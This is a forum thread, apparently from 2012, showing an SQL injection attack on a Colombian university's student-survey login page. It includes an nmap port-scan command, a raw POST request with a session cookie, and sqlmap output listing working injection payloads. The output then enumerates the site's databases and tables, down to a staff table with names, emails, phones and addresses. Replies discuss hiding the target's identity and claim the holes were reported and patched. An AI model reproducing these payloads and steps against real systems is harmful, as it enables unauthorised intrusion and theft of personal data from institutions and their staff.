#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /logs/
Disallow: /media/
Disallow: /modules/
Disallow: /plugins/
Disallow: /templates/
Disallow: /tmp/
nmap ipuniversidad -v -p 1-65535
20121245
<img src="afsgsgsgs.jpg">
http://evuln.com/tools/xss-encoder/
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TYPE=MyISAM CHARACTER SET `utf8`' at line 29 SQL=CREATE TABLE `jos_banner` ( `bid` int(11) NOT NULL auto_increment, `cid` int(11) NOT NULL default '0', `type` varchar(30) NOT NULL default 'banner', `name` varchar(255) NOT NULL default '', `alias` varchar(255) NOT NULL default '', `imptotal` int(11) NOT NULL default '0', `impmade` int(11) NOT NULL default '0', `clicks` int(11) NOT NULL default '0', `imageurl` varchar(100) NOT NULL default '', `clickurl` varchar(200) NOT NULL default '', `date` datetime default NULL, `showBanner` tinyint(1) NOT NULL default '0', `checked_out` tinyint(1) NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `editor` varchar(50) default NULL, `custombannercode` text,
http://190.26.192.198//paquetes/autenticacion/index.php

POST //paquetes/autenticacion/index.php HTTP/1.1
Host: 190.26.192.198
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://ipuniversidad//paquetes/autenticacion/index.php?accion=InicioEncuesta
Cookie: PHPSESSID=oqaqa2oqt0jp2f9psi8j3958t5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

redirect=index.php&accion=autenticarEstudiante&usu_login_aut=MICODIGO DE ESTUDIANTE&IMAGE.x=0&IMAGE.y=0
[12:21:54] [INFO] reading file codigos.txt
[12:21:54] [INFO] testing connection to the target url
[12:21:55] [INFO] testing if the url is stable, wait a few seconds
[12:21:56] [INFO] url is stable
[12:21:56] [INFO] testing if POST parameter 'usu_login_aut' is dynamic
[12:21:57] [INFO] confirming that POST parameter 'usu_login_aut' is dynamic
[12:21:57] [INFO] POST parameter 'usu_login_aut' is dynamic
[12:21:57] [INFO] heuristic test shows that POST parameter 'usu_login_aut' might be injectable (possible DBMS: MySQL)
[12:21:57] [INFO] testing for SQL injection on POST parameter 'usu_login_aut'
[12:21:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:21:58] [WARNING] reflective value(s) found and filtering out
[12:21:59] [INFO] POST parameter 'usu_login_aut' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[12:21:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[12:22:00] [INFO] POST parameter 'usu_login_aut' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[12:22:00] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[12:22:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[12:22:21] [INFO] POST parameter 'usu_login_aut' is 'MySQL > 5.0.11 AND time-based blind' injectable
[12:22:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[12:22:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[12:22:21] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:22:24] [INFO] target url appears to have 18 columns in query
[12:22:27] [INFO] POST parameter 'usu_login_aut' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'usu_login_aut' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 26 HTTP(s) requests:
---
Place: POST
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=59 AND 9932=9932

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=59 AND (SELECT 6298 FROM(SELECT COUNT(*),CONCAT(0x3a7871723a,(SELECT (CASE WHEN (6298=6298) THEN 1 ELSE 0 END)),0x3a7474633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 18 columns
    Payload: id=59 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a7871723a,0x78544b4f706652666f69,0x3a7474633a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=59 AND SLEEP(5)
---
[12:22:30] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, PHP 5.2.13, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0
[12:22:30] [INFO] fetching database names
[12:22:30] [INFO] the SQL query used returns 3 entries
[12:22:30] [INFO] retrieved: "information_schema"
[12:22:31] [INFO] retrieved: "autoevaluacion"
available databases [2]:
[*] information_schema
[*] autoevaluacion
[12:22:31] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.universidad.edu.co'
[*] shutting down at 12:22:31
back-end DBMS: MySQL 5.0
[12:28:57] [INFO] fetching tables for database: 'autoevaluacion'
[12:28:57] [INFO] the SQL query used returns 4 entries
[12:28:57] [INFO] retrieved: "preguntas_estudiante"
[12:28:58] [INFO] retrieved: "preguntas_docente"
[12:28:58] [INFO] retrieved: "codigos_estudiante"
[12:28:59] [INFO] retrieved: "codigos_docente"
Database: autoevaluacion
[4 tables]
+----------------------+
| preguntas_estudiante |
| preguntas_docente    |
| codigos_estudiante   |
| codigos_docente      |
+----------------------+
[12:32:38] [INFO] fetching columns for table 'codigos_docentes' in database 'autoevaluacion'
Database: autoevaluacion
Table: codigos_docentes
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| activo    | int(11)      |
| apellidos | varchar(100) |
| cargo     | varchar(150) |
| ciudad    | varchar(150) |
| direccion | varchar(150) |
| email     | varchar(100) |
| empresa   | varchar(150) |
| id        | int(11)      |
| login     | varchar(100) |
| nombre    | varchar(100) |
| pais      | varchar(150) |
| telefono  | varchar(150) |
| temporal  | varchar(100) |
+-----------+--------------+
OK, congratulations, I'm looking forward to the 2nd part... Oh! Yes, you should hide the domain better. I think more than one "smart aleck" knows it is a Colombian university, and from the news item that is there it is easy to work out which one it would be. PS: It didn't let me get at /administrator; anyway, I suppose you reported it like a good boy :3 Anyway, waiting for your 2nd part.
It doesn't matter whether they find it or not xD everything has already been reported and patched
Quote from: duvanalex3029 on December 04, 2012, 04:50:01 pm
It doesn't matter whether they find it or not xD everything has already been reported and patched
It has some possible XSS, besides, its Apache is a ....xD lel
Quote from: White Rabbit on December 04, 2012, 04:50:58 pm
Quote from: duvanalex3029 on December 04, 2012, 04:50:01 pm
It doesn't matter whether they find it or not xD everything has already been reported and patched
It has some possible XSS, besides, its Apache is a ....xD lel
Is the Apache vulnerable? Or very outdated?